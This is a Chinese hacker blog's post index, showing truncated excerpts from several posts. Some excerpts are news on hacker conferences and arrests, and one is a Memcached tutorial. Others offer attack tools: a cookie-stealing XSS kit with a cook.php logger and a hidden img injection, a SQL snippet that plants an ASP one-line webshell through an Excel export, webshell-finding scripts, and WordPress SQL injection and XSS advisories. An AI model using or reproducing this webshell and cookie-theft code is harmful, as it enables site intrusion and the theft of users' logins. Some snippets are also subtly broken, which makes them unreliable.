WebShell'S Blog

好吧之前就把google发在了90sec 跟t00ls了！不过过了一会黑阔们就去扫描我shell地址了！ 额滴神啊，速度太快了！！没办法马上赶写了一个批量修改文件名称的把shell全部移动了地方修改了文件名！ 最后再把漏洞文件给那个啥了！不过一看黑阔们又挖出shell地址出来了！！ 好吧不跟你们耗了。想想还是把代码发出来吧！！ 这个是百度批量的。自己保存为xx.php <?php print...

- 阅读全文 -

很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。 今天写个通用脚本工具 文件如下   asp.asp或者php.php 或者cookies.htm效果如下 保存文本   发送邮件   获取的cookies 截获用户名密码   主文件Get.asp用来获取发来的信息,并且保存到 TXT或者发送到邮箱 内容如下:使用方法： asp.asp是Asp中调用Get.asp的例子内容...

- 阅读全文 -

cook.php <? $info = $_SERVER['QUSEY_STRING']; if ($info) { $fp = fopen("info.txt"."a"); fwrite($fp.$info."\n"); fclose($fp); } ?>   使用代码： 插入: <img name="ak" width=0 height=0 border=0>...

- 阅读全文 -

一年一度的“世界黑客大会”不久前在拉斯维加斯闭幕。从如何运用漏洞入侵西门子公司的“S7”自动控制系统，到如何自制可无线遥控的间谍飞机，林林总总，无奇不有。和往年稍有不同的是，美国几乎所有与国家安全相关的政府部门，都派员参加了此次大会。 据说国土安全部赶来是避免与会的黑客“一时兴起”，说得太多，教会恐怖分子如何利用网络漏洞入侵美国关键基础设施；联邦调查局是借机发现线索和打击黑客犯罪，锁定网络犯罪嫌疑...

- 阅读全文 -

朋友公司开发的项目要用到缓存，于是叫我推荐一个，我说我们公司在用Memcached，然后就问了我一堆关于Memcached的问题，直接把我问的无言了，因为虽然项目用到了，但是我自己却没搞过这个，只是知道有这么个东西存在，唉… 准备工作： 1.从http://splinedancer.com/memcached-win32/下载Memcached for Windows。解压至任意目录（如C:\me...

- 阅读全文 -

标题: WordPress MM Duplicate plugin <= 1.2 SQL Injection Vulnerability 作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm www.badguest.cn) 下载地址: http://downloads.wordpress.org/plugin/mm-du...

- 阅读全文 -

Author : Darshit Ashara Date   : 21/08/2011 Vendor : Wordpress Version: 3.2.1 WordPress核心模块不正确的代码（post-template.php） 导致跨站点脚本。 笔者可以简单地更新 view plaincopy to clipboardprint? </a><script>alert(...

- 阅读全文 -

create table cmd(shell text) insert into cmd (shell) values('<%execute request(1)%>') SELECT shell into [fuck] in 'D:\web\me\backdoorx\asp.asp;x.xls' 'EXCEL 4.0;'from cmd  

- 阅读全文 -

利比亚.ly域名注册网站被黑 但是黑客并没有控制数据库注册表。。 只是黑了首页，其他页面还是完好的，只是有限的攻入了web服务器！ 分页可浏览！http://www.nic.ly/whois.php 官方地址：http://www.nic.ly/ 载图留念：     感谢︶ε╰  憧憬²º¹¹ 投稿！

- 阅读全文 -

群仅有初中、高中文化，自称“骑士”的80后在 传奇私服业内有着响当当的名号。他们日收入数十万，开着玛莎拉蒂、宾利等豪车， 住别墅，投资上千万的写字楼……他们的钱从何而来？ 今日上午，重庆市公安局网络安全监察总队透露，被称为“骑士攻击小组” 的19名成员已被警方捉获，他们通过“黑客”技术攻击传奇游戏私服网站，垄断 网站广告代理，从而提取高额广告代理费，涉案金额超过7000万元。 “黑客”攻击网站垄断...

- 阅读全文 -